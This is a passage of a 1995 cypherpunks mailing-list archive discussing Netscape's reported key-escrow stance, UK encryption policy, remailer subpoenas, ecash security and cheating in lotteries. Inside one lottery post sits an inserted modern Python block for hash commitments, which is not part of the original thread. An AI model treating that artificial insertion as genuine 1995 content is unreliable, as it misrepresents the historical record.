will execute Sys V R4 binaries, as well as SCO binaries which opens that
whole set of markets (software availability). 

   at the Solaris 2.1 and 2.2 levels, Sparc Solaris and X86 Solaris were
not even compatible to each other. I just took 200K+ lines of code from a
Sys V package and ported it to both Sparc and X86 Solaris 2.4 --perfect.
The code also had defines for 4.2+ BSD --those also compiled.  Take your
pick. 

   Sun got the message on standards; their response was to meet both; and,
they have done a good job of it. Secondly, there is no such thing as
bug-free code --that's like free-lunch and it's all relevant.  Which would
you rather have? patches available on the net, or be forced to upgrade to 
new bugs with MS plus a few more overkill features.

   Again, my point is: why bad mouth Sun?  This is what has fractured UNIX
in the market place and gives the MS assholes the ability to not only
stomp UNIX with reviews which always ask "...which flavour of UNIX is it
this month?"  but, even worse, it gives Gates an opportunity to set YET
ANOTHER **PROPRIETARY** MS STANDARD --that does not run securely with the
mainline.  Do you wish to give Microsoft, whose intentions have never
wavered from getting a piece of every transaction in the world,
**complete** control over everything? on every desktop?  

In other words, do you want to see Microsoft, and possibly only
Microsoft/Intel, in the marketplace. Network managers complained about the
Ray Noorda cult, but wait until everybody is forced to join the Bill Gates
cult. 

   SUN is not the enemy; MS is.  Do you wish to live with MS who,
according to the head cultist, **never** issues a maintenance release
since the software does not have bugs.  Just updates, **expensive**
updates, which fix some bugs, add a few overkill features, and introduce
new bugs. 

   Is there any really good software for **applications** on UNIX at
even close to windows compatible prices --let alone the wealth of material
available.  Sure WABI gets the main productivity pieces, but PageMaker
and Corel are frozen at Version 5 for WABI.

   Personally, I use OS/2 as the front end to my Suns;  OS/2 is likewise
frozen at W3.1 level software --but at least WinOS2 does not crash my
entire system or network.  I want some of the features in the W95 versions
of Corel and PageMaker, such as HTML --they will never be made available
for either OS/2 or UNIX. 

   In other words, we need to stop bitching, and start supporting the
alternative systems --constructively.  It all comes back to software, and
even us techno-freaks, or whatever we are with the long hair blowing all
over, need to think about the people who want a simple answer and MS gives
the glitter --if we do not help sustain the alternatives, we will not even
have the luxury of decent hardware. Even GNU has a W95 and an NT **full
pack**. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Fri, 1 Dec 1995 02:21:52 +0800
To: cypherpunks@toad.com
Subject: Spam the Sign II
Message-ID: <199511301740.SAA29245@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Looks like Spam the Sign I was a little premature.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 1 Dec 1995 08:31:39 +0800
To: Cypherpunks@toad.com
Subject: UK Labour Party policy on encryption
Message-ID: <9511301846.ZM3820@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[see http://www.poptel.org.uk/labour-party/policy/info-highway/content.html
for full text]

> It is important that privacy is rigorously protected over the
> new networks, for both personal and commercial reasons. We do
> not accept the "clipper chip" argument developed in the United
> States for the authorities to be able to swoop down on any
> encrypted message at will and unscramble it.
>
> The only power we would wish to give to the authorities, in
> order to pursue a defined legitimate anti-criminal purpose,
> would be to enable decryption to be demanded under judicial
> warrant (in the same way that a warrant is required in order
> to search someone's home).
>
> Attempts to control the use of encryption technology are wrong
> in principle, unworkable in practice, and damaging to the
> long-term economic value of the information networks. There is
> no fundamental difference between an encrypted file and a
> locked safe. A safe may be effectively impregnable in that the
> effort taken to open it would destroy the contents. An
> encryption algorithm, similarly, may be effectively
> unbreakable.

Notes.

I've taken this entirely out of context*; cpunks will be glad to
find that the same document manages to hit at least two of the
horsemen of the infocalypse. A few paragraphs earlier is the
standard "must protect women, children, and ethnic minorities"
(paraphrased) argument.

Labour seems likely to form the next government. And even if they
don't, their stated policy might be a good thing to take to the
Tories, saying something along the lines of, "Labour has a clue,
where's yours?" [Note that I was unable to find the Tory point
of view.]

I found this stuff from Anne Campbell MP's home page.

http://www.worldserver.pipex.com/home/anne.campbell

* for brevity's sake.

richard

Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML5COB1gtCYLvIJ1AQFZ1wP+Ox2fbOKsEbtl06GZugpB8ecHl5cGYHSQ
7sBro0QFr2v4KZOV6X435LXmAqSV8ML+BmVsT/1bnfUzsxeIQErhC0q1kQeA+hAX
h21SYfW6hN3h2L9aOtLr/1FDZkKAcXGDNFkvq/weKQdxCbtTw0Nl1ZQym3oaYdhT
MrjKi85fU44=
=CeYH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 04:32:02 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: WTO an even worse possibility as Inet regulator
Message-ID: <Pine.BSD.3.91.951130184221.7762G-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   based on an article from the (London) Financial Times [available from
John Young at jya@pipeline.com with subject line WAY_lad],

   a very credible white paper is circulating for the WTO to establish an 
internet CZAR to regulate the Internet and level the playing field world 
wide. 

   personally, the Feds and the FCC are bad enough --now they want to 
have a **global** bureaucracy play god  -???

   are we ready to go back to UUCP?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Fri, 1 Dec 1995 09:28:17 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <26C5DB002BF@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Nov 95 at 13:30, Timothy C. May wrote:

: At 7:26 PM 11/30/95, Ravi Pandya wrote:
: >If you're looking for an alternative Web browser for Windows, we just made
: >ours available for free at www.netmanage.com. It's fast and reliable, and
: >supports HTML 3.0, inline video, software distribution, VRML (NT version),
: >Real Audio, TrueSpeech, etc.
: 
: This shows the price Netscape could pay for taking a pro-surveillance,
: anti-privacy stance.
: 

	The word is getting out.  Both brokers I have system support
	contracts with have called me asking for my take.
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Waking a person unnecessarily should not be considered a capital crime.
For a first offence, that is





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sat, 2 Dec 1995 14:58:11 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <26C7BF95B31@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Nov 95 at 12:56, Jay Campbell wrote:

: >> "finessing" laws will become more important.  In short, they WILL have
: >> a subpoena--then what?
: >
: >	Then they'll find out that I don't have any information that
: >could help them, anyway.
: 
: What about a court order to (a) start comprehensive logging, and (b) not
: tell anyone under penalty of ______ .

	And at that point, you shut down the remailer and log each and every 
bounce.

	Now, they could get an order forcing you to run a remailer ~ but that 
would open up a whole new can of worms i.e. can you be forced, under 
court order, to commit a crime?

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Autocracy is based on the assumption that one man is wiser
than a million men.  How's that again?  I missed something.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 03:45:15 +0800
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
In-Reply-To: <199511301704.JAA23295@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951130185007.7762H-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> > "finessing" laws will become more important.  In short, they WILL have
> > a subpoena--then what?
> 
> 	Then they'll find out that I don't have any information that
> could help them, anyway.
> 
> 	sameer
>
   yes, and that is where the absurdity of American law enters in, they
**charge** you with conspiracy!  --or destroying evidence of a crime (by
failing to keep logs)  --or even better, aiding and abetting the
commission of a crime as part of the "chain" of the crime. 

   and, you better believe they do whatever they want. and do not ignore
RICO, because if they "allege" there were six or more conspirators, or
participants, they are starting to use RICO --and you can go away for
life without parole for even a simple "crime." 

   let me put it this way --been there, done that.  

   however, screw'm, if we don't put our asses on the line, not only will 
America in general not have freedom of speech, but we will not either. I 
do not necessarily condone the militias, but I certainly will not 
interfere with their rights 

it may not be too long before the words of Thomas Jefferson may ring true:
the purpose of the militia [a citizens' militia] is to, God forbid,
overthrow a state which has become tyrannical. 

 ****								   ****
 the government who fears weapons in the hands of its citizens, should!
 ****								   ****




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Dec 1995 12:53:05 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <199512010309.TAA10065@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian wrote:
>>The idea behind my proposal was that any participant can determine if he has
>>won.  The winning number (a hash of which was published beforehand, as in
>>a "bit commitment" scheme) is announced.  Anyone who picked a number
>>that, say, matched in the last digit, wins $2.  If you matched the
>>last two digits, you win $10, etc.  The house (without sacrificing
>>reputation) can't arrange who the big payoffs will go to, nor can it
>>(as I think Tim suggested) give out lots of small prizes and no big ones.


There are two main kinds of lotteries - systems where many people have a 
moderate chance of winning a fixed amount of money, and lotto-systems where
the winners split a jackpot that's based on current and/or previous players' 
losses\\\\\\ ticket purchases.  The former kind, such as numbers games,
works because the expected payoff is less than the ticket price -
you can make it honest through techniques like bit commitment,
but as Tim points out, the kind of people who care about things like
bit commitment know enough math to know these games are money-losers.
Perhaps you can attract some people with a flashy user interface,
but it's not like really being in Vegas with booze and babes and blinkenlights
and incessant noise and stale smoke and Siegfried and Roy's tiger act.

On the other hand, lotto systems are too easy to cheat with anonymous payees.
Sure, you can make sure that any genuine winners get paid, 
but you can also throw in the occasional ringer to share the prize,
and nobody can tell unless you do it often enough that people start checking
the probabilities.  Bit commitment doesn't prevent this kind of cheating;
it just verifies that you knew the number in advance (oops :-).

You need some sort of externally verifiable source of random numbers;
an MD5 hash of the Wall Street Journal stock price web page from
a few hours after the last bet and digital timestamping or something
might be good enough.  (Of course, a single unified stock price page
becomes even less meaningful with large volumes of on-line anonymous private
stock trading.)

(The pre-digital version of this scam was to hire some poor old grandma from
the South Bronx as the shill, since nobody'd accuse Granny of conspiring with
the mob.  It wasn't really enough then, and now Granny may be using anonymous
digicash for her payoffs...)

Another way to cheat progressive lotto systems is to not report all
your ticket sales each week, since anonymity makes it excessively hard
to verify.  Committing to the list of all the numbers bet almost works,
but you could still skim a few percent by reporting smaller sales of
popularly chosen numbers, with the risk that you've occasionally got to
pay all six real winners 1/5 of the jackpot if you're unlucky.
You can't get around this by using large enough numbers that there's
a small probability of duplication, because that also reduces the 
probability of a win too far, and because some folks are going to pick
7777777...777 regardless of how many bits long their bet is.

Government lotteries are surprisingly free from this sort of problem.
Not because governments are excessively honest, of course :-)
Employee pay isn't generally dependent on profitability, 
there's enough public scrutiny that it's harder for employees to cheat
for their own gain (rather than their lotto organizations'),
and (perhaps most important) they're already taking such an appallingly
high cut of the winnings that there's no need for regular cheating -
it's one of the efficiencies possible in a highly unnatural monopoly.

But if all else fails, you might be able to talk Scott Adams into giving
you the World Wide Web franchise for Dogbert's Value-Priced Lottery Tickets..

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
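
An added example, not part of the post above or of any real lottery system: the checks discussed in this message, with the house's hash commitment to its number, a draw derived from public data published after betting closes, and a commitment to the list of tickets sold. SHA-256 stands in for the MD5 mentioned in the post; the function names, ticket serials and sample data are constructed assumptions, and prize tiers beyond the two quoted from Ian's proposal are not modelled.

```python
import hashlib
import hmac


def h(*parts):
    """SHA-256 over length-prefixed byte strings (unambiguous field boundaries)."""
    d = hashlib.sha256()
    for p in parts:
        d.update(len(p).to_bytes(4, "big") + p)
    return d.digest()


# --- 1. House picks the number and commits to it before bets open ---------
def commit_number(number, nonce):
    """Published in advance; hides the number until the nonce is revealed."""
    return h(b"draw", nonce, number.encode())


def check_reveal(commitment, number, nonce):
    """Proves only that the house fixed the number before the bets came in."""
    return hmac.compare_digest(commitment, commit_number(number, nonce))


# --- 2. Number derived from data nobody controls, published after close ----
def draw_from_public_data(public_bytes, digits):
    """Anyone holding the same bytes recomputes the same winning number."""
    n = int.from_bytes(hashlib.sha256(public_bytes).digest(), "big")
    return str(n % 10 ** digits).zfill(digits)


# --- 3. House commits to every ticket sold before the draw -----------------
def ticket_leaf(number, serial):
    """Salted hash of one ticket; the serial is known only to its buyer."""
    return h(b"ticket", serial, number.encode())


def sales_digest(leaves):
    """Single value to timestamp: commits to the whole list of sold tickets."""
    return h(b"sales", *sorted(leaves))


def ticket_is_listed(leaves, digest, number, serial):
    """A buyer's check that the published list is the committed one and
    contains their ticket; an under-reported sale fails here."""
    if not hmac.compare_digest(sales_digest(leaves), digest):
        return False
    return ticket_leaf(number, serial) in set(leaves)


def audit_winners(leaves, digest, claims, winning):
    """Accept jackpot claims only for tickets committed before the draw, so a
    ringer invented after the number is known is rejected."""
    if not hmac.compare_digest(sales_digest(leaves), digest):
        return []
    listed = set(leaves)
    return [(n, s) for n, s in claims
            if n == winning and ticket_leaf(n, s) in listed]


# --- Fixed-prize tiers from the quoted proposal ----------------------------
PRIZES = {1: 2, 2: 10}  # trailing digits matched -> dollars; later tiers elided


def suffix_match(ticket, winning):
    """Number of trailing digits the ticket shares with the winning number."""
    count = 0
    for a, b in zip(reversed(ticket), reversed(winning)):
        if a != b:
            break
        count += 1
    return count


def fixed_prize(ticket, winning):
    """Assumption: matches longer than two digits pay the two-digit prize."""
    return PRIZES.get(min(suffix_match(ticket, winning), max(PRIZES)), 0)


if __name__ == "__main__":
    # Constructed sample data.
    sold = [("7777777", b"s1"), ("0001234", b"s2"), ("9991234", b"s3")]
    leaves = [ticket_leaf(n, s) for n, s in sold]
    digest = sales_digest(leaves)            # timestamped before the draw
    winning = draw_from_public_data(b"constructed closing-price page", 7)
    print("winning number:", winning)
    print("prizes:", [(n, fixed_prize(n, winning)) for n, _ in sold])
    ringer = ("9991234", b"added-after-draw")
    print("valid claims:", audit_winners(leaves, digest, sold + [ringer], "9991234"))
```

The commitment in part 1 passes even when the house has sold itself a winning ticket, which is the gap the post describes; parts 2 and 3 together close it only if the sales digest is fixed before the public data exists.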






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 12:18:42 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010321.TAA09577@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Mike McNally wrote:
 
> Jeff Weinstein writes:
>  > have lots of stuff attributed to Jim, but very little of it is actual
>  > quotes.
> 
> Well, if there was in fact a speech made from which the pseudo-quotes
> in the article were taken, then surely the full text of that speech
> will be made available somewhere for clarification.

I read this article, and thought it to be quite a twist.  It's suicidal
from Netscape to say this. 

It's almost like a couple of stock promotions I was at yesterday at the
Calgary Petroleum Club.  Horrible nasty stuff.  Suicidal speeches. 
Especially the one guy from Neutrino Resources (an Oil and Gas Company)
who decided to explain what a Neutrino was before he started his "spiel"
and talking about how great his company was and how cashflow wasn't a good
measure of a company's worth.

Netscape could well learn from that.  (Unfortunately, I doubt that anyone
was there.) People in these audiences DO listen.  Press, investment
analysts, and the like who do pepper the audience didn't all just fall off
the turnip truck. 

Jim Clark, should have seen or heard this.  

If he did, then he might be a bit more careful with what he says ... but
then again, I'm not sure how involved he is in daily operations.  But
nothing that Netscape does any longer surprises this writer ... look at
how they handled the revelation back on Friday, October Thirteenth that
the emperor's product had no clothes. 

Did they respond to the claims??  No.  

All they did was spam this list with noise "unofficially, not speaking for
the company, but I work for Netscape" noise, and then continued
distributing their product.  Maybe these revelations will help to get the
Netscape product pulled from people's machines, but I'm not gonna hold my
breath on that one. 

The momentum which is behind their stock and product promotion now has a 
life of its own.  Stopping Netscape (and the stock from advancing) is 
like trying to stop a steam-roller.

But for now, I'm busy setting up an email account to allow people to send
replies to me, and to settle this "reputation" stuff once and for all.  

I should be back to posting very soon. 




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> | Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
> | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 12:35:26 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010335.TAA10408@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Jay Holovacs wrote:

> On Thu, 30 Nov 1995, Timothy C. May wrote:
> 
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles. 

Uhhm, I think that that depends on what "class" of stockholder you're
speaking of.  The short term "trader" whose idea of a long-term investment
is the one that gives a decent return by lunchtime, or the one who wants
to buy a good company, make a solid investment, and put their stock away
for five years, knowing that their capital is being put to good use. 

They really are different players with different approaches.

Netscape stock as an example has lots of momentum ... it's in a feeding 
frenzy.  And I'm pretty sure that someone with "very" deep pockets -- 
possibly even someone who's got their own printing press -- is busily
buying everything in sight, and crossing trades on every up-tick.

(Disclaimer: Just my opinion, not speaking officially in any capacity.)

I'm not sure who might be behind any of this, though.  I haven't the
desktop power, nor the data or tool-set to chart and flow-analyze the
trading record, and see what the play is.)

I wouldn't really be surprised though if it was offshore interests who
want to "cash-in" on high-tech.  Standard "Von Clausewitz" reader-types. 
People who subscribe to "Von Clausewitz's" principles on "other means". 

I base this assessment purely on price-movement, and on the "known" 
fundamentals.  To this writer, it's pretty transparent.  

In the last six-weeks, Netscape has gone from the 60's to flirting with
150. That's one heck of a trend-line that some pseudo-technical
floor-trader types will jump on. 

Part of that is "market-forces", and part of that is definitely
"market-makers". 

The only way to counteract that is probably some Elliott Wave Theory
shakeout, or something similar.  It's the only way to stop 'em from
blowing up the balloon.  Or you need one killer scandal. 

Cheap advice, btw ... it's free ... and no-one even had to buy me a Gin &
Tonic, or some fancy canapes to hear it. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David A Wagner <daw@CS.Berkeley.EDU>
Date: Fri, 1 Dec 1995 15:31:15 +0800
To: cypherpunks@toad.com
Subject: digital receipts and cash
Message-ID: <199512010408.UAA04333@quito.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Digital cash protocols are starting to look like they could become very
popular and useful.

But under current proposals, there's one thing you don't get when you
spend digital cash: a digital receipt.

(Later, if the vendor reneges on the transaction, you'd have the digital
receipt to prove that you paid & the vendor is cheating you.)

This seems like it would be a really useful feature.  Does anyone know
if there are any *practical* protocols to do this?

ObCypherpunks relevance: digital receipts seem (IMHO) important to the
emergence of fair and robust reputation markets.  Discuss.

ObCrypto relevance: I've looked through _Applied Cryptography_, but the
protocols listed there aren't practical -- they require something like
100 rounds of interaction!  Can this be improved?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 1 Dec 1995 04:44:42 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Credit card theft Re: The future will be easy to use
Message-ID: <Pine.3.89.9511301809.A9289-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> What if it's an ecash password getting stolen? Who's liable? (lemme 
> guess, your money's gone, tough luck!)

From what I remember of the contract, that's true, the bank appear to take
no liability for ecash (check the WWW page for the real details). As I'm
not likely to have more than about $ 50 of ecash at any time, I'm not
*that* concerned about it. Big users could transfer payments back into
their dollar account ASAP to avoid most of these problems, just keeping
enough in the ecash account to make any payments that may be required. 

It's not really any worse than physical cash, as long as the software is
reliable, which it appears to be (I've lost payments in the past, but 
cancelling them has always worked to get the money back).

> Disclaimer: I don't have a marktwain account at the moment, so I can't
> say a thing about the security of the system. I wish them the absolute best 
> of luck.

I do, and yes, from conversations with them it appears that if someone
gets your secret key and password they can clear out all the money from
your ecash account. This is potentially a real problem for shops, which
have to have a secret key file on the machine they run from. Currently
this even applies to shops that only *accept* ecash, though there may be
an accept-only server out sometime, and I found a way to delete the secret
key itself from the file and still have it work (I forget the exact
details, you basically zero 256 bytes of the file that contain the key,
which appears to be 768-bits according to the debug output, so I don't
know what the extra bits are used for). 

Shops that pay out need to have an *unencrypted* secret key on the server,
which is scary, but there's not much you can do about it if you're running
on an insecure server...  The only way around it that I can see would be
to withdraw ecash using a secure machine and upload it to your server, so
that the shop could make payments until the ecash supply was depleted and
then you'd manually have to withdraw more. Then if someone broke into your
account they'd get the ecash, but not the key, and you could limit your
exposure to the amount you uploaded at any one time. I'll probably be
doing that once the check I mailed over gets into my ecash account. 

This is strictly my understanding of the system based on what I've been
told, so hopefully if I'm wrong then someone from DigiCash will correct
me.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 05:33:20 +0800
To: hallam@w3.org
Subject: Re: WTO an even worse possibility as Inet regulator
In-Reply-To: <9511301947.AA05400@zorch.w3.org>
Message-ID: <Pine.BSD.3.91.951130202218.7762O-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995 hallam@w3.org wrote:

> 
> >  a very credible white paper is circulating for the WTO to establish an 
> >internet CZAR to regulate the Internet and level the playing field world 
> >wide. 
> 
> >   personally, the Feds and the FCC are bad enough --now they want to 
> >have a **global** bureaucracy play god  -???
> 
> 
> Depends on what the role of the Czar is. If it is to stop silliness like 
> border disputes and keep national governments out of the loop then it
> could be a good thing. If they want to regulate it is a bad thing.
>
   	<attila>  

	1. unfortunately, the stated intent is to regulate.

 	2. have you ever seen a bureaucracy that does not turn to 
           regulation once it has the power?  (unless they were asleep <G>)

> WTO is mainly known for the GATT which they brokered. This is basically
> an agreement amongst national governments to be "hands off" in their
> tariff regulations. 
> 
	<attila sez>  but WTO is also accumulating a rather larger 
    bureaucracy and is challenging Uncle Sam on several major unilateral
    actions.  They will have the power of international courts which,
    today, the U.S.  can ignore, but at great international bad publicity
    in a time where we have few enough friends as it is --if the U.S.
    slips into the abyss which the incompetent beltway maggots have been
    building for 50 years, the US' current "friends" will be first in line
    to screw us over --and it will be by the WTOs and world courts, or the
    Rockefeller NWO --read UN, and UN troops in America. 

	As slippery and somewhat slimy as Gingrich is, so far he has been
    the only one to put his career on line admitting to the fact the
    current overstuffed bureaucracy *does not work* --now, if he could get
    a clue other than get the government out of your nose and really
    deliver (impossible given Clinton's retrenchment in Fair Deal
    idealism)....

> There is the potential for governments to regulate the Internet. It is
> in everyone's interest to keep hands off but if one starts to regulate
> then it is in others' interests to regulate. The general solution to
> prisoner's dilemma games is to form some type of alliance. It is not
> possible to form alliances in classical prisoner's dilemmas since they
> are restricted to a single dilemma at a time. Governments are involved
> with multiple dilemmas and hence have multiple agreements. The main reason to
> keep a treaty is that the credibility of government depends on keeping 
> treaties. Thus a treaty can solve a prisoner's dilemma problem since 
> the gain from breaking one treaty is more than offset by the potential loss
> through other sides abrogating other treaties.
> 
> 
> I suspect that the role of an Internet Czar would be mainly ensuring that 
> fat Internet pipes arrived throughout the third world. George Soros has
> been very active in this area, he paid for much of the infrastructure
> development into Eastern Europe. If we could persuade Bill Gates that his 
> mission in life was to cable Africa to the Internet somehow we might have the
> whole planet online before 2000.
> 
> I would not be too worried about WTO banning crypto or attempting looney
> tune ideas like insisting on OSI protocols. The UN generally does some very 
> worthwhile work in allocating radio frequencies and such like and has done so 
> for many years without problems. They allocate areas of the Clarke belt for 
> satellites and do all sorts of mundane tasks.
> 
> 
> One of the odd things about power is that the larger the scale the more mundane 
> the decisions. At the local level councillors decide to build or close schools 
> and hospitals. At the global level negotiations are held on the size of holes in 
> fishing nets and the exact specifications of ball bearings.
> 
> If people want to see the Federal government weakened in power the only way to 
> do so is to make it cede power both upwards and downwards. A national speed 
> limit may be a bad idea (I personally think what was wrong was 55mph) but 
> national standard roadsigns is a good idea. International standard roadsigns are 
> a better idea still. 
> 
	<attila sez>  amen for international road signs --go metric! join 
    the living!  go 24 hour clocks and not be lost in the rest of the world!

        and, while we're at it, let's use universal time! yeah, right! 
    this one I can see.

> 
> 		Phill.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Sat, 2 Dec 1995 01:41:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511301752.MAA06161@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951130205725.857B-100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Perry E. Metzger wrote:

> 
> Jeff Weinstein writes:
> > sameer wrote:
> > > 
> > > http://www.cnet.com/Central/News/govt.html
> > > 
> > >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
> Jeff, I'll be blunt.
> 
> I'm never going to use Netscape again if it turns out to be true. Sure

 --snip--	

> Tell him that if he is being misquoted he'd better make sure that 
> retractions get printed and fast.

 --snip--
 
> If you don't want "Netscape Inside" to be treated as a warning label,
> you guys will reject escrow as any other ethical company would -- or
> else.
> 
> Perry
> 

Perfectly put, Perry.  I have my store-bought copy of Netscape all
neatly wrapped and ready to send back to them, pending only their
timely response.

If I do not hear them denounce GAK, then away it goes.

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 1 Dec 1995 14:04:23 +0800
To: graeme@chem2.chem.swin.edu.au>
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <Pine.ULT.3.91.951130212409.28316B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[As seen on the cypherpunks list]

I just confirmed this for Mozilla/2.0b3 (Win95; I). I also see an entry 
from the Mac version of 2.0b3. No need for anyone else to test it. 

Very nasty indeed. To what other variables might someone have access?

Scott is probably going to be responsible for a good bit of the traffic 
on the trans-pacific cables tomorrow :-)

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 1 Dec 1995 12:36:30 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010343.VAA26254@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>If he has not clarified his position by tomorrow evening, I will set up some
>web pages explaining the situation and decrying Netscape's apparent
>position on key escrow (GAK). I have the quotes that L. McCarthy posted,
>and Jeff Weinstein's response. I have not been able to get the article off
>the server yet (possible all the cypherpunks downloading it?). Any other
>documents I should include?

I'm working on an "obnoxify" program to convert normal html documents into
documents that look normal to non-netscape browsers, but are too painful to
read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
would be a good time to decide whether or not to distribute it.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 12:47:27 +0800
To: holovacs@styx.ios.com (Jay Holovacs)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <199512010307.WAA18467@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jay Holovacs wrote:
| On Thu, 30 Nov 1995, Timothy C. May wrote:

| > Can Netscape continue to prosper? This latest issue won't kill it,
| 
| I suspect this will unfortunately help. Stockholders are interested in 
| profits, not principles. Co-oping with the feds will help Netscape get to 
| the commercial market sooner, and most customers, sadly don't give a damn 
| about privacy (or don't understand).

	That's very true.  We should look at what stockholders tend to
care about (although, in the case of many internet stocks, it does
seem to be 'a bigger fool').

	One thing that stockholders do care about is liability.  It's
my (non lawyerly) opinion that anyone implementing GAK without a
government mandate to do so is opening themselves up to huge liability
the Clipper database of keys gets out.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
